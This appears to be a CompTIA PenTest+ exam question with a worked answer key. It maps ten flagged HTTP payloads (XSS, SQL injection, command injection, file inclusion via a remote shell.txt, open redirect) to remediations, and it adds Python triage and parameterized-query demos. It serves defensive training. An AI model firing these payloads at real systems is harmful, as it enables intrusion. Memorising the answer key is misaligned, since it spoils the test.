Question 7 of 52 from exam PT0-001: CompTIA PenTest+

Question

HOTSPOT - You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS - Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Hot Area:

HTTP Request Payload Table

Payloads

#inner-tab"><script>alert(1)</script>

item-widget' ;waitfor%20delay%20'00:00:20'

item-widget%20union%20select%20null, null, @@version; --

search=Bob"%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e

item-widget'+convert(int,@@version)+'

site=www.exa'ping%20-c%2010%20localhost'mple.com

redir=http:%2f%2fwww.malicious-site.com

logfile=%2fetc%2fpasswd%00

lookup=$(whoami)

logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt

Each payload row has two drop-downs, Vulnerability Type and Remediation. The same option list appears in every row.

Vulnerability Type (drop-down options):

Command Injection
DOM-based Cross Site Scripting
SQL Injection (Error)
SQL Injection (Stacked)
SQL Injection (Union)
Reflected Cross Site Scripting
Local File Inclusion
Remote File Inclusion
URL Redirect

Remediation (drop-down options):

Parameterized queries
Preventing external calls
Input Sanitization: ..., \, /, sandbox requests
Input Sanitization: ', ;, $, {, }, (, )
Input Sanitization: ', <, :, >, -

Explanations

HTTP Request Payload Table (worked answer)

The drop-down selections are not legible in the screenshot, so the mapping below is worked from the payloads themselves. The method is the same for every row: URL-decode the value, identify the context the payload is trying to break out of (HTML, SQL string, shell string, file path, URL), and then pick the remediation that removes that context rather than the one that merely blocks this particular string.

1. #inner-tab"><script>alert(1)</script>
   Decoded: #inner-tab"><script>alert(1)</script>
   Vulnerability Type: DOM-based Cross Site Scripting
   Remediation: Input Sanitization: ', <, :, >, -
   The payload lives in the URL fragment (after #), which the browser never sends to the server. It only fires if client-side script reads location.hash and writes it into the page unescaped.

2. item-widget' ;waitfor%20delay%20'00:00:20'
   Decoded: item-widget' ;waitfor delay '00:00:20'
   Vulnerability Type: SQL Injection (Stacked)
   Remediation: Parameterized queries
   The quote closes the string literal, the semicolon ends the statement, and a second T-SQL statement (WAITFOR DELAY) is appended. A 20-second pause is a blind, time-based confirmation that the injection worked.

3. item-widget%20union%20select%20null, null, @@version; --
   Decoded: item-widget union select null, null, @@version; --
   Vulnerability Type: SQL Injection (Union)
   Remediation: Parameterized queries
   UNION appends a second result set to the original query. The two nulls pad the column count to match; @@version is returned in the third column of the normal product listing.

4. search=Bob"%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e
   Decoded: search=Bob"><img src=a onerror=alert(1)>
   Vulnerability Type: Reflected Cross Site Scripting
   Remediation: Input Sanitization: ', <, :, >, -
   The search term is echoed into the response. The quote closes an attribute, > closes the tag, and an <img> with an unresolvable src fires its onerror handler.

5. item-widget'+convert(int,@@version)+'
   Decoded: item-widget'+convert(int,@@version)+'
   Vulnerability Type: SQL Injection (Error)
   Remediation: Parameterized queries
   CONVERT(INT, @@version) cannot succeed; the conversion error the database raises carries the version string back to the attacker in the error page.

6. site=www.exa'ping%20-c%2010%20localhost'mple.com
   Decoded: site=www.exa'ping -c 10 localhost'mple.com
   Vulnerability Type: Command Injection
   Remediation: Input Sanitization: ', ;, $, {, }, (, )
   The first quote closes a shell-quoted argument, ping -c 10 runs ten echo requests (roughly a nine-second delay, the command-injection counterpart of row 2), and the second quote reopens the string so the rest of the command still parses.

7. redir=http:%2f%2fwww.malicious-site.com
   Decoded: redir=http://www.malicious-site.com
   Vulnerability Type: URL Redirect
   Remediation: Preventing external calls
   An attacker-controlled absolute URL in a redirect parameter. The fix is to restrict the target to an allow-list of internal destinations and refuse external ones.

8. logfile=%2fetc%2fpasswd%00
   Decoded: logfile=/etc/passwd followed by a NUL byte
   Vulnerability Type: Local File Inclusion
   Remediation: Input Sanitization: ..., \, /, sandbox requests
   An absolute path into the filesystem, with %00 to truncate any suffix (for example .log) the application appends. Stripping path separators and confining file access to a sandbox directory closes it.

9. lookup=$(whoami)
   Decoded: lookup=$(whoami)
   Vulnerability Type: Command Injection
   Remediation: Input Sanitization: ', ;, $, {, }, (, )
   $( ) is shell command substitution; the value is reaching a shell, not just a program argument.

10. logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt
    Decoded: logFile=http://www.malicious-site.com/shell.txt
    Vulnerability Type: Remote File Inclusion
    Remediation: Preventing external calls
    The same include parameter as row 8, but pointed at a remote server so the application fetches and executes attacker-hosted code. The sandboxing option would also help, but only preventing external calls (for example disabling remote includes such as PHP's allow_url_include, and blocking outbound fetches from the web tier) removes the remote fetch itself.

Two patterns are worth noting for the real hardening job. First, every SQL row maps to Parameterized queries and not to a character list: once the value is bound as a parameter the quote, semicolon and comment marker are data, so there is nothing left to filter. Second, the sanitization lists are keyed to the context being escaped (shell metacharacters for rows 6 and 9, HTML metacharacters for rows 1 and 4, path separators for row 8); a list copied from one context does nothing for another.
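The decision procedure used in the worked answer, written out as an added Python example (editor-supplied code, not part of the original question or its answer key). It URL-decodes each of the ten payloads and applies the checks in the order a reviewer would: remote URL first, then path traversal, then HTML markup, then SQL syntax, then shell syntax. The regular expressions are illustrative triage heuristics, not a production WAF rule set, and the REMEDIATION table simply mirrors the drop-down pairing given above.

```python
import re
from urllib.parse import unquote

# The ten payloads from the question, transcribed from the hotspot image
PAYLOADS = [
    '#inner-tab"><script>alert(1)</script>',
    "item-widget' ;waitfor%20delay%20'00:00:20'",
    "item-widget%20union%20select%20null, null, @@version; --",
    'search=Bob"%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e',
    "item-widget'+convert(int,@@version)+'",
    "site=www.exa'ping%20-c%2010%20localhost'mple.com",
    "redir=http:%2f%2fwww.malicious-site.com",
    "logfile=%2fetc%2fpasswd%00",
    "lookup=$(whoami)",
    "logFile=http:%2f%2fwww.malicious-site.com%2fshell.txt",
]

# Remediation drop-down option paired with each vulnerability type
REMEDIATION = {
    "SQL Injection (Stacked)": "Parameterized queries",
    "SQL Injection (Union)": "Parameterized queries",
    "SQL Injection (Error)": "Parameterized queries",
    "DOM-based Cross Site Scripting": "Input Sanitization: ', <, :, >, -",
    "Reflected Cross Site Scripting": "Input Sanitization: ', <, :, >, -",
    "Command Injection": "Input Sanitization: ', ;, $, {, }, (, )",
    "Local File Inclusion": "Input Sanitization: ..., \\, /, sandbox requests",
    "Remote File Inclusion": "Preventing external calls",
    "URL Redirect": "Preventing external calls",
}

# Triage heuristics (illustrative, not a WAF rule set)
REMOTE_URL = re.compile(r"^(https?|ftp)://", re.I)
REDIRECT_PARAM = re.compile(r"redir|url|next|return|goto|dest", re.I)
TRAVERSAL = re.compile(r"\.\./|\.\.\\|/etc/passwd|\x00")
XSS = re.compile(r"<script|<img[^>]*\bonerror\s*=|javascript:", re.I)
STACKED_SQL = re.compile(r"""['"]\s*;\s*(waitfor|exec|drop|insert|update|delete|shutdown)\b""", re.I)
UNION_SQL = re.compile(r"\bunion\s+(all\s+)?select\b", re.I)
ERROR_SQL = re.compile(r"\b(convert|cast)\s*\(\s*int\b|\bextractvalue\s*\(|\bupdatexml\s*\(", re.I)
CMD_INJ = re.compile(r"""\$\(|`|(^|['";|&\s])(ping|whoami|id|cat|ls|nc|curl|wget|sh|bash)\b""", re.I)


def split_param(payload):
    """Split 'name=value' into its parts; a bare value gets an empty name."""
    name, sep, value = payload.partition("=")
    return (name, value) if sep else ("", payload)


def classify(payload):
    """Return the vulnerability type the payload's signature points to."""
    name, value = split_param(payload)
    decoded = unquote(payload)          # %2f -> '/', %3c -> '<', %00 -> NUL
    decoded_value = unquote(value)
    # 1. A remote URL in the value is either fetched by the server (RFI) or
    #    used as a redirect target; the parameter name decides which.
    if REMOTE_URL.match(decoded_value):
        return "URL Redirect" if REDIRECT_PARAM.search(name) else "Remote File Inclusion"
    # 2. Path traversal or an absolute path, with a NUL byte to cut off an appended suffix
    if TRAVERSAL.search(decoded_value):
        return "Local File Inclusion"
    # 3. Script or event-handler markup. A payload carried in the fragment (#) never
    #    reaches the server, so only client-side script can put it into the page.
    if XSS.search(decoded):
        return "DOM-based Cross Site Scripting" if payload.startswith("#") else "Reflected Cross Site Scripting"
    # 4. SQL: quote-break then ';' plus a second statement (stacked), UNION SELECT,
    #    or a type conversion that makes the DBMS leak data in an error message
    if STACKED_SQL.search(decoded):
        return "SQL Injection (Stacked)"
    if UNION_SQL.search(decoded):
        return "SQL Injection (Union)"
    if ERROR_SQL.search(decoded):
        return "SQL Injection (Error)"
    # 5. Shell command substitution or a quote-break followed by a shell command
    if CMD_INJ.search(decoded):
        return "Command Injection"
    return "Unclassified"


def triage(payloads=PAYLOADS):
    """Return (payload, decoded form, vulnerability type, remediation) for each payload."""
    rows = []
    for p in payloads:
        vuln = classify(p)
        rows.append((p, unquote(p).replace("\x00", "\\x00"), vuln, REMEDIATION.get(vuln, "n/a")))
    return rows


if __name__ == "__main__":
    for raw, decoded, vuln, fix in triage():
        print(f"{decoded:<50} {vuln:<32} {fix}")
```

The order of the checks matters: the two remote-URL rows contain slashes and would otherwise trip the traversal rule, and the UNION payload ends in "; --" but is not stacked, because nothing executable follows the semicolon.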

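Why the three SQL rows map to Parameterized queries rather than to a character list, as an added example (editor-supplied, not from the exam): the UNION payload from row 3 is run against a constructed SQLite table first through a string-concatenated query and then through a bound parameter. Assumptions: @@version is replaced with SQLite's sqlite_version(), the trailing "; --" is replaced with a clause that balances the quote the payload opened so the example does not depend on how the driver treats trailing comments, and the products table and its rows are demo data.

```python
import sqlite3

# Constructed sample schema standing in for the shop's item table (demo data, not from the exam)
SCHEMA = """
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
INSERT INTO products (name, price) VALUES ('item-widget', 9.99), ('item-gadget', 19.99);
"""

# Row 3 of the question, adapted: @@version -> sqlite_version(), and the trailing
# "; --" swapped for a clause that balances the quote the payload opened
UNION_PAYLOAD = "item-widget' union select null, null, sqlite_version() where '1'='1"


def connect():
    """In-memory database loaded with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, name):
    """The 'before' form: the value is pasted into the statement text, so a quote
    in it ends the literal and everything after it is parsed as SQL."""
    sql = "SELECT id, name, price FROM products WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, name):
    """The remediation: the statement is compiled with a placeholder and the value
    is bound afterwards, so it can only ever be compared, never parsed."""
    sql = "SELECT id, name, price FROM products WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def engine_version(conn):
    """What the UNION payload is trying to read out through the product listing."""
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    conn = connect()
    # Concatenated: the product row plus a second row carrying the engine version
    print("concatenated :", lookup_vulnerable(conn, UNION_PAYLOAD))
    # Parameterized: no product is literally named after the payload, so nothing comes back
    print("parameterized:", lookup_parameterized(conn, UNION_PAYLOAD))
```

With the parameterized form the whole payload, quote and UNION included, is compared against the name column as a single value, which is exactly why no character list is needed for those rows. The same holds for the stacked and error-based payloads in rows 2 and 5: bound parameters never reach the SQL parser.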